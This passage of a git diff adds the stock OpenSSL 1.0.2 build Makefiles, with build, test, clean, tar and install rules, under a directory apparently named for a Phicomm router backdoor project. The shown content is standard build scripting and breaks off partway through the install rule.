+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libssl.pc
+	cp openssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/openssl.pc
+
+install_html_docs:
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	for subdir in apps crypto ssl; do \
+		mkdir -p $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+		for i in doc/$$subdir/*.pod; do \
+			fn=`basename $$i .pod`; \
+			echo "installing html/$$fn.$(HTMLSUFFIX)"; \
+			cat $$i \
+			| sed -r 's/L<([^)]*)(\([0-9]\))?\|([^)]*)(\([0-9]\))?>/L<\1|\3>/g' \
+			| pod2html --podroot=doc --htmlroot=.. --podpath=apps:crypto:ssl \
+			| sed -r 's/<!DOCTYPE.*//g' \
+			> $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir/$$fn.$(HTMLSUFFIX); \
+			$(PERL) util/extract-names.pl < $$i | \
+				grep -v $$filecase "^$$fn\$$" | \
+				(cd $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+				 while read n; do \
+					PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$(HTMLSUFFIX) "$$n".$(HTMLSUFFIX); \
+				 done); \
+		done; \
+	done
+
+install_docs:
+	@$(PERL) $(TOP)/util/mkdir-p.pl \
+		$(INSTALL_PREFIX)$(MANDIR)/man1 \
+		$(INSTALL_PREFIX)$(MANDIR)/man3 \
+		$(INSTALL_PREFIX)$(MANDIR)/man5 \
+		$(INSTALL_PREFIX)$(MANDIR)/man7
+	@pod2man="`cd ./util; ./pod2mantest $(PERL)`"; \
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	set -e; for i in doc/apps/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 1 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done; \
+	set -e; for i in doc/crypto/*.pod doc/ssl/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 3 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.org b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.org
new file mode 100644
index 0000000..b7a3f96
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.org
@@ -0,0 +1,686 @@
+##
+## Makefile for OpenSSL
+##
+
+VERSION=
+MAJOR=
+MINOR=
+SHLIB_VERSION_NUMBER=
+SHLIB_VERSION_HISTORY=
+SHLIB_MAJOR=
+SHLIB_MINOR=
+SHLIB_EXT=
+PLATFORM=dist
+OPTIONS=
+CONFIGURE_ARGS=
+SHLIB_TARGET=
+
+# HERE indicates where this Makefile lives.  This can be used to indicate
+# where sub-Makefiles are expected to be.  Currently has very limited usage,
+# and should probably not be bothered with at all.
+HERE=.
+
+# INSTALL_PREFIX is for package builders so that they can configure
+# for, say, /usr/ and yet have everything installed to /tmp/somedir/usr/.
+# Normally it is left empty.
+INSTALL_PREFIX=
+INSTALLTOP=/usr/local/ssl
+
+# Do not edit this manually. Use Configure --openssldir=DIR do change this!
+OPENSSLDIR=/usr/local/ssl
+
+# NO_IDEA - Define to build without the IDEA algorithm
+# NO_RC4  - Define to build without the RC4 algorithm
+# NO_RC2  - Define to build without the RC2 algorithm
+# THREADS - Define when building with threads, you will probably also need any
+#           system defines as well, i.e. _REENTERANT for Solaris 2.[34]
+# TERMIO  - Define the termio terminal subsystem, needed if sgtty is missing.
+# TERMIOS - Define the termios terminal subsystem, Silicon Graphics.
+# LONGCRYPT - Define to use HPUX 10.x's long password modification to crypt(3).
+# DEVRANDOM - Give this the value of the 'random device' if your OS supports
+#           one.  32 bytes will be read from this when the random
+#           number generator is initalised.
+# SSL_FORBID_ENULL - define if you want the server to be not able to use the
+#           NULL encryption ciphers.
+#
+# LOCK_DEBUG - turns on lots of lock debug output :-)
+# REF_CHECK - turn on some xyz_free() assertions.
+# REF_PRINT - prints some stuff on structure free.
+# CRYPTO_MDEBUG - turns on my 'memory leak' detecting stuff
+# MFUNC - Make all Malloc/Free/Realloc calls call
+#       CRYPTO_malloc/CRYPTO_free/CRYPTO_realloc which can be setup to
+#       call application defined callbacks via CRYPTO_set_mem_functions()
+# MD5_ASM needs to be defined to use the x86 assembler for MD5
+# SHA1_ASM needs to be defined to use the x86 assembler for SHA1
+# RMD160_ASM needs to be defined to use the x86 assembler for RIPEMD160
+# Do not define B_ENDIAN or L_ENDIAN if 'unsigned long' == 8.  It must
+# equal 4.
+# PKCS1_CHECK - pkcs1 tests.
+
+CC= cc
+CFLAG= -O
+DEPFLAG= 
+PEX_LIBS= 
+EX_LIBS= 
+EXE_EXT= 
+ARFLAGS=
+AR=ar $(ARFLAGS) r
+RANLIB= ranlib
+NM= nm
+PERL= perl
+TAR= tar
+TARFLAGS= --no-recursion
+MAKEDEPPROG=makedepend
+LIBDIR=lib
+
+# We let the C compiler driver to take care of .s files. This is done in
+# order to be excused from maintaining a separate set of architecture
+# dependent assembler flags. E.g. if you throw -mcpu=ultrasparc at SPARC
+# gcc, then the driver will automatically translate it to -xarch=v8plus
+# and pass it down to assembler.
+AS=$(CC) -c
+ASFLAG=$(CFLAG)
+
+# For x86 assembler: Set PROCESSOR to 386 if you want to support
+# the 80386.
+PROCESSOR=
+
+# CPUID module collects small commonly used assembler snippets
+CPUID_OBJ= 
+BN_ASM= bn_asm.o
+EC_ASM=
+DES_ENC= des_enc.o fcrypt_b.o
+AES_ENC= aes_core.o aes_cbc.o
+BF_ENC= bf_enc.o
+CAST_ENC= c_enc.o
+RC4_ENC= rc4_enc.o
+RC5_ENC= rc5_enc.o
+MD5_ASM_OBJ= 
+SHA1_ASM_OBJ= 
+RMD160_ASM_OBJ= 
+WP_ASM_OBJ=
+CMLL_ENC=
+MODES_ASM_OBJ=
+ENGINES_ASM_OBJ=
+PERLASM_SCHEME=
+
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+# Zlib stuff
+ZLIB_INCLUDE=
+LIBZLIB=
+
+# TOP level FIPS install directory.
+FIPSDIR=
+
+# This is the location of fipscanister.o and friends.
+# The FIPS module build will place it $(INSTALLTOP)/lib
+# but since $(INSTALLTOP) can only take the default value
+# when the module is built it will be in /usr/local/ssl/lib
+# $(INSTALLTOP) for this build may be different so hard
+# code the path.
+
+FIPSLIBDIR=
+
+# The location of the library which contains fipscanister.o
+# normally it will be libcrypto unless fipsdso is set in which
+# case it will be libfips. If not compiling in FIPS mode at all
+# this is empty making it a useful test for a FIPS compile.
+
+FIPSCANLIB=
+
+# Shared library base address. Currently only used on Windows.
+#
+
+BASEADDR=
+
+DIRS=   crypto ssl engines apps test tools
+ENGDIRS= ccgost
+SHLIBDIRS= crypto ssl
+
+# dirs in crypto to build
+SDIRS=  \
+	objects \
+	md2 md4 md5 sha mdc2 hmac ripemd whrlpool \
+	des aes rc2 rc4 rc5 idea bf cast camellia seed modes \
+	bn ec rsa dsa ecdsa dh ecdh dso engine \
+	buffer bio stack lhash rand err \
+	evp asn1 pem x509 x509v3 conf txt_db pkcs7 pkcs12 comp ocsp ui krb5 \
+	cms pqueue ts jpake srp store cmac
+# keep in mind that the above list is adjusted by ./Configure
+# according to no-xxx arguments...
+
+# tests to perform.  "alltests" is a special word indicating that all tests
+# should be performed.
+TESTS = alltests
+
+MAKEFILE= Makefile
+
+MANDIR=$(OPENSSLDIR)/man
+MAN1=1
+MAN3=3
+MANSUFFIX=
+HTMLSUFFIX=html
+HTMLDIR=$(OPENSSLDIR)/html
+SHELL=/bin/sh
+
+TOP=    .
+ONEDIRS=out tmp
+EDIRS=  times doc bugs util include certs ms shlib mt demos perl sf dep VMS
+WDIRS=  windows
+LIBS=   libcrypto.a libssl.a
+SHARED_CRYPTO=libcrypto$(SHLIB_EXT)
+SHARED_SSL=libssl$(SHLIB_EXT)
+SHARED_LIBS=
+SHARED_LIBS_LINK_EXTS=
+SHARED_LDFLAGS=
+
+GENERAL=        Makefile
+BASENAME=       openssl
+NAME=           $(BASENAME)-$(VERSION)
+TARFILE=        $(NAME).tar
+WTARFILE=       $(NAME)-win.tar
+EXHEADER=       e_os2.h
+HEADER=         e_os.h
+
+all: Makefile build_all openssl.pc libssl.pc libcrypto.pc
+
+# as we stick to -e, CLEARENV ensures that local variables in lower
+# Makefiles remain local and variable. $${VAR+VAR} is tribute to Korn
+# shell, which [annoyingly enough] terminates unset with error if VAR
+# is not present:-( TOP= && unset TOP is tribute to HP-UX /bin/sh,
+# which terminates unset with error if no variable was present:-(
+CLEARENV=	TOP= && unset TOP $${LIB+LIB} $${LIBS+LIBS}	\
+		$${INCLUDE+INCLUDE} $${INCLUDES+INCLUDES}	\
+		$${DIR+DIR} $${DIRS+DIRS} $${SRC+SRC}		\
+		$${LIBSRC+LIBSRC} $${LIBOBJ+LIBOBJ} $${ALL+ALL}	\
+		$${EXHEADER+EXHEADER} $${HEADER+HEADER}		\
+		$${GENERAL+GENERAL} $${CFLAGS+CFLAGS}		\
+		$${ASFLAGS+ASFLAGS} $${AFLAGS+AFLAGS}		\
+		$${LDCMD+LDCMD} $${LDFLAGS+LDFLAGS} $${SCRIPTS+SCRIPTS}	\
+		$${SHAREDCMD+SHAREDCMD} $${SHAREDFLAGS+SHAREDFLAGS}	\
+		$${SHARED_LIB+SHARED_LIB} $${LIBEXTRAS+LIBEXTRAS}
+
+BUILDENV=	PLATFORM='$(PLATFORM)' PROCESSOR='$(PROCESSOR)' \
+		CC='$(CC)' CFLAG='$(CFLAG)' 			\
+		AS='$(CC)' ASFLAG='$(CFLAG) -c'			\
+		AR='$(AR)' NM='$(NM)' RANLIB='$(RANLIB)'	\
+		CROSS_COMPILE='$(CROSS_COMPILE)'	\
+		PERL='$(PERL)' ENGDIRS='$(ENGDIRS)'		\
+		SDIRS='$(SDIRS)' LIBRPATH='$(INSTALLTOP)/$(LIBDIR)'	\
+		INSTALL_PREFIX='$(INSTALL_PREFIX)'		\
+		INSTALLTOP='$(INSTALLTOP)' OPENSSLDIR='$(OPENSSLDIR)'	\
+		LIBDIR='$(LIBDIR)'				\
+		MAKEDEPEND='$$$${TOP}/util/domd $$$${TOP} -MD $(MAKEDEPPROG)' \
+		DEPFLAG='-DOPENSSL_NO_DEPRECATED $(DEPFLAG)'	\
+		MAKEDEPPROG='$(MAKEDEPPROG)'			\
+		SHARED_LDFLAGS='$(SHARED_LDFLAGS)'		\
+		KRB5_INCLUDES='$(KRB5_INCLUDES)' LIBKRB5='$(LIBKRB5)'	\
+		ZLIB_INCLUDE='$(ZLIB_INCLUDE)' LIBZLIB='$(LIBZLIB)'	\
+		EXE_EXT='$(EXE_EXT)' SHARED_LIBS='$(SHARED_LIBS)'	\
+		SHLIB_EXT='$(SHLIB_EXT)' SHLIB_TARGET='$(SHLIB_TARGET)'	\
+		PEX_LIBS='$(PEX_LIBS)' EX_LIBS='$(EX_LIBS)'	\
+		CPUID_OBJ='$(CPUID_OBJ)' BN_ASM='$(BN_ASM)'	\
+		EC_ASM='$(EC_ASM)' DES_ENC='$(DES_ENC)' 	\
+		AES_ENC='$(AES_ENC)' CMLL_ENC='$(CMLL_ENC)'	\
+		BF_ENC='$(BF_ENC)' CAST_ENC='$(CAST_ENC)'	\
+		RC4_ENC='$(RC4_ENC)' RC5_ENC='$(RC5_ENC)'	\
+		SHA1_ASM_OBJ='$(SHA1_ASM_OBJ)'			\
+		MD5_ASM_OBJ='$(MD5_ASM_OBJ)'			\
+		RMD160_ASM_OBJ='$(RMD160_ASM_OBJ)'		\
+		WP_ASM_OBJ='$(WP_ASM_OBJ)'			\
+		MODES_ASM_OBJ='$(MODES_ASM_OBJ)'		\
+		ENGINES_ASM_OBJ='$(ENGINES_ASM_OBJ)'		\
+		PERLASM_SCHEME='$(PERLASM_SCHEME)'		\
+		FIPSLIBDIR='${FIPSLIBDIR}'			\
+		FIPSDIR='${FIPSDIR}'				\
+		FIPSCANLIB="$${FIPSCANLIB:-$(FIPSCANLIB)}"	\
+		THIS=$${THIS:-$@} MAKEFILE=Makefile MAKEOVERRIDES=
+# MAKEOVERRIDES= effectively "equalizes" GNU-ish and SysV-ish make flavors,
+# which in turn eliminates ambiguities in variable treatment with -e.
+
+# BUILD_CMD is a generic macro to build a given target in a given
+# subdirectory.  The target must be given through the shell variable
+# `target' and the subdirectory to build in must be given through `dir'.
+# This macro shouldn't be used directly, use RECURSIVE_BUILD_CMD or
+# BUILD_ONE_CMD instead.
+#
+# BUILD_ONE_CMD is a macro to build a given target in a given
+# subdirectory if that subdirectory is part of $(DIRS).  It requires
+# exactly the same shell variables as BUILD_CMD.
+#
+# RECURSIVE_BUILD_CMD is a macro to build a given target in all
+# subdirectories defined in $(DIRS).  It requires that the target
+# is given through the shell variable `target'.
+BUILD_CMD=  if [ -d "$$dir" ]; then \
+	    (	cd $$dir && echo "making $$target in $$dir..." && \
+		$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. DIR=$$dir $$target \
+	    ) || exit 1; \
+	    fi
+RECURSIVE_BUILD_CMD=for dir in $(DIRS); do $(BUILD_CMD); done
+BUILD_ONE_CMD=\
+	if expr " $(DIRS) " : ".* $$dir " >/dev/null 2>&1; then \
+		$(BUILD_CMD); \
+	fi
+
+reflect:
+	@[ -n "$(THIS)" ] && $(CLEARENV) && $(MAKE) $(THIS) -e $(BUILDENV)
+
+sub_all: build_all
+build_all: build_libs build_apps build_tests build_tools
+
+build_libs: build_crypto build_ssl build_engines
+
+build_crypto:
+	@dir=crypto; target=all; $(BUILD_ONE_CMD)
+build_ssl:
+	@dir=ssl; target=all; $(BUILD_ONE_CMD)
+build_engines:
+	@dir=engines; target=all; $(BUILD_ONE_CMD)
+build_apps:
+	@dir=apps; target=all; $(BUILD_ONE_CMD)
+build_tests:
+	@dir=test; target=all; $(BUILD_ONE_CMD)
+build_tools:
+	@dir=tools; target=all; $(BUILD_ONE_CMD)
+
+all_testapps: build_libs build_testapps
+build_testapps:
+	@dir=crypto; target=testapps; $(BUILD_ONE_CMD)
+
+fips_premain_dso$(EXE_EXT): libcrypto.a
+	[ -z "$(FIPSCANLIB)" ] || $(CC) $(CFLAG) -Iinclude \
+		-DFINGERPRINT_PREMAIN_DSO_LOAD -o $@  \
+		$(FIPSLIBDIR)fips_premain.c $(FIPSLIBDIR)fipscanister.o \
+		libcrypto.a $(EX_LIBS)
+
+libcrypto$(SHLIB_EXT): libcrypto.a fips_premain_dso$(EXE_EXT)
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		if [ "$(FIPSCANLIB)" = "libcrypto" ]; then \
+			FIPSLD_LIBCRYPTO=libcrypto.a ; \
+			FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; \
+			export CC FIPSLD_CC FIPSLD_LIBCRYPTO; \
+		fi; \
+		$(MAKE) -e SHLIBDIRS=crypto  CC="$${CC:-$(CC)}" build-shared && \
+		(touch -c fips_premain_dso$(EXE_EXT) || :); \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+libssl$(SHLIB_EXT): libcrypto$(SHLIB_EXT) libssl.a
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		$(MAKE) SHLIBDIRS=ssl SHLIBDEPS='-lcrypto' build-shared; \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+clean-shared:
+	@set -e; for i in $(SHLIBDIRS); do \
+		if [ -n "$(SHARED_LIBS_LINK_EXTS)" ]; then \
+			tmp="$(SHARED_LIBS_LINK_EXTS)"; \
+			for j in $${tmp:-x}; do \
+				( set -x; rm -f lib$$i$$j ); \
+			done; \
+		fi; \
+		( set -x; rm -f lib$$i$(SHLIB_EXT) ); \
+		if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+			( set -x; rm -f cyg$$i$(SHLIB_EXT) lib$$i$(SHLIB_EXT).a ); \
+		fi; \
+	done
+
+link-shared:
+	@ set -e; for i in $(SHLIBDIRS); do \
+		$(MAKE) -f $(HERE)/Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			symlink.$(SHLIB_TARGET); \
+		libs="$$libs -l$$i"; \
+	done
+
+build-shared: do_$(SHLIB_TARGET) link-shared
+
+do_$(SHLIB_TARGET):
+	@ set -e; libs='-L. $(SHLIBDEPS)'; for i in $(SHLIBDIRS); do \
+		if [ "$$i" = "ssl" -a -n "$(LIBKRB5)" ]; then \
+			libs="$(LIBKRB5) $$libs"; \
+		fi; \
+		$(CLEARENV) && $(MAKE) -f Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			LIBDEPS="$$libs $(EX_LIBS)" \
+			link_a.$(SHLIB_TARGET); \
+		libs="-l$$i $$libs"; \
+	done
+
+libcrypto.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libcrypto'; \
+	    echo 'Description: OpenSSL cryptography library'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: '; \
+	    echo 'Libs: -L$${libdir} -lcrypto'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libcrypto.pc
+
+libssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libssl'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires.private: libcrypto'; \
+	    echo 'Libs: -L$${libdir} -lssl'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libssl.pc
+
+openssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries and tools'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: libssl libcrypto' ) > openssl.pc
+
+Makefile: Makefile.org Configure config
+	@echo "Makefile is older than Makefile.org, Configure or config."
+	@echo "Reconfigure the source tree (via './config' or 'perl Configure'), please."
+	@false
+
+libclean:
+	rm -f *.map *.so *.so.* *.dylib *.dll engines/*.so engines/*.dll engines/*.dylib *.a engines/*.a */lib */*/lib
+
+clean:	libclean
+	rm -f shlib/*.o *.o core a.out fluff rehash.time testlog make.log cctest cctest.c
+	@set -e; target=clean; $(RECURSIVE_BUILD_CMD)
+	rm -f $(LIBS)
+	rm -f openssl.pc libssl.pc libcrypto.pc
+	rm -f speed.* .pure
+	rm -f $(TARFILE)
+	@set -e; for i in $(ONEDIRS) ;\
+	do \
+	rm -fr $$i/*; \
+	done
+
+makefile.one: files
+	$(PERL) util/mk1mf.pl >makefile.one; \
+	sh util/do_ms.sh
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile > $(TOP)/MINFO
+	@set -e; target=files; $(RECURSIVE_BUILD_CMD)
+
+links:
+	@$(PERL) $(TOP)/util/mkdir-p.pl include/openssl
+	@$(PERL) $(TOP)/util/mklink.pl include/openssl $(EXHEADER)
+	@set -e; target=links; $(RECURSIVE_BUILD_CMD)
+
+gentests:
+	@(cd test && echo "generating dummy tests (if needed)..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on generate );
+
+dclean:
+	rm -rf *.bak include/openssl certs/.0
+	@set -e; target=dclean; $(RECURSIVE_BUILD_CMD)
+
+rehash: rehash.time
+rehash.time: certs apps
+	@if [ -z "$(CROSS_COMPILE)" ]; then \
+		(OPENSSL="`pwd`/util/opensslwrap.sh"; \
+		[ -x "apps/openssl.exe" ] && OPENSSL="apps/openssl.exe" || :; \
+		OPENSSL_DEBUG_MEMORY=on; \
+		export OPENSSL OPENSSL_DEBUG_MEMORY; \
+		$(PERL) tools/c_rehash certs/demo) && \
+		touch rehash.time; \
+	else :; fi
+
+test:   tests
+
+tests: rehash
+	@(cd test && echo "testing..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on OPENSSL_CONF=../apps/openssl.cnf tests );
+	OPENSSL_CONF=apps/openssl.cnf util/opensslwrap.sh version -a
+
+report:
+	@$(PERL) util/selftest.pl
+
+depend:
+	@set -e; target=depend; $(RECURSIVE_BUILD_CMD)
+
+lint:
+	@set -e; target=lint; $(RECURSIVE_BUILD_CMD)
+
+tags:
+	rm -f TAGS
+	find . -name '[^.]*.[ch]' | xargs etags -a
+
+errors:
+	$(PERL) util/ck_errf.pl -strict */*.c */*/*.c
+	$(PERL) util/mkerr.pl -recurse -write
+	(cd engines; $(MAKE) PERL=$(PERL) errors)
+
+stacks:
+	$(PERL) util/mkstack.pl -write
+
+util/libeay.num::
+	$(PERL) util/mkdef.pl crypto update
+
+util/ssleay.num::
+	$(PERL) util/mkdef.pl ssl update
+
+crypto/objects/obj_dat.h: crypto/objects/obj_dat.pl crypto/objects/obj_mac.h
+	$(PERL) crypto/objects/obj_dat.pl crypto/objects/obj_mac.h crypto/objects/obj_dat.h
+crypto/objects/obj_mac.h: crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num crypto/objects/obj_mac.h
+crypto/objects/obj_xref.h: crypto/objects/objxref.pl crypto/objects/obj_xref.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objxref.pl crypto/objects/obj_mac.num crypto/objects/obj_xref.txt >crypto/objects/obj_xref.h
+
+apps/openssl-vms.cnf: apps/openssl.cnf
+	$(PERL) VMS/VMSify-conf.pl < apps/openssl.cnf > apps/openssl-vms.cnf
+
+crypto/bn/bn_prime.h: crypto/bn/bn_prime.pl
+	$(PERL) crypto/bn/bn_prime.pl >crypto/bn/bn_prime.h
+
+
+TABLE: Configure
+	(echo 'Output of `Configure TABLE'"':"; \
+	$(PERL) Configure TABLE) > TABLE
+
+update: errors stacks util/libeay.num util/ssleay.num crypto/objects/obj_dat.h crypto/objects/obj_xref.h apps/openssl-vms.cnf crypto/bn/bn_prime.h TABLE depend
+
+# Build distribution tar-file. As the list of files returned by "find" is
+# pretty long, on several platforms a "too many arguments" error or similar
+# would occur. Therefore the list of files is temporarily stored into a file
+# and read directly, requiring GNU-Tar. Call "make TAR=gtar dist" if the normal
+# tar does not support the --files-from option.
+tar:
+	find . -type d -print | xargs chmod 755
+	find . -type f -print | xargs chmod a+r
+	find . -type f -perm -0100 -print | xargs chmod a+x
+	find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE | sort > ../$(TARFILE).list; \
+	$(TAR) $(TARFLAGS) --files-from ../$(TARFILE).list -cvf - | \
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - |\
+	gzip --best >../$(TARFILE).gz; \
+	rm -f ../$(TARFILE).list; \
+	ls -l ../$(TARFILE).gz
+
+tar-snap:
+	@$(TAR) $(TARFLAGS) -cvf - \
+		`find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE \! -name '*.o' \! -name '*.a' \! -name '*.so' \! -name '*.so.*'  \! -name 'openssl' \! -name '*test' \! -name '.#*' \! -name '*~' | sort` |\
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - > ../$(TARFILE);\
+	ls -l ../$(TARFILE)
+
+dist:   
+	$(PERL) Configure dist
+	@$(MAKE) dist_pem_h
+	@$(MAKE) SDIRS='$(SDIRS)' clean
+	@$(MAKE) TAR='$(TAR)' TARFLAGS='$(TARFLAGS)' tar
+
+dist_pem_h:
+	(cd crypto/pem; $(MAKE) -e $(BUILDENV) pem.h; $(MAKE) clean)
+
+install: all install_docs install_sw
+
+install_sw:
+	@$(PERL) $(TOP)/util/mkdir-p.pl $(INSTALL_PREFIX)$(INSTALLTOP)/bin \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR) \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/misc \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/certs \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/private
+	@set -e; headerlist="$(EXHEADER)"; for i in $$headerlist;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@set -e; target=install; $(RECURSIVE_BUILD_CMD)
+	@set -e; liblist="$(LIBS)"; for i in $$liblist ;\
+	do \
+		if [ -f "$$i" ]; then \
+		(       echo installing $$i; \
+			cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			$(RANLIB) $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i ); \
+		fi; \
+	done;
+	@set -e; if [ -n "$(SHARED_LIBS)" ]; then \
+		tmp="$(SHARED_LIBS)"; \
+		for i in $${tmp:-x}; \
+		do \
+			if [ -f "$$i" -o -f "$$i.a" ]; then \
+			(       echo installing $$i; \
+				if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+					c=`echo $$i | sed 's/^lib\(.*\)\.dll\.a/cyg\1-$(SHLIB_VERSION_NUMBER).dll/'`; \
+					cp $$c $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c; \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				else \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
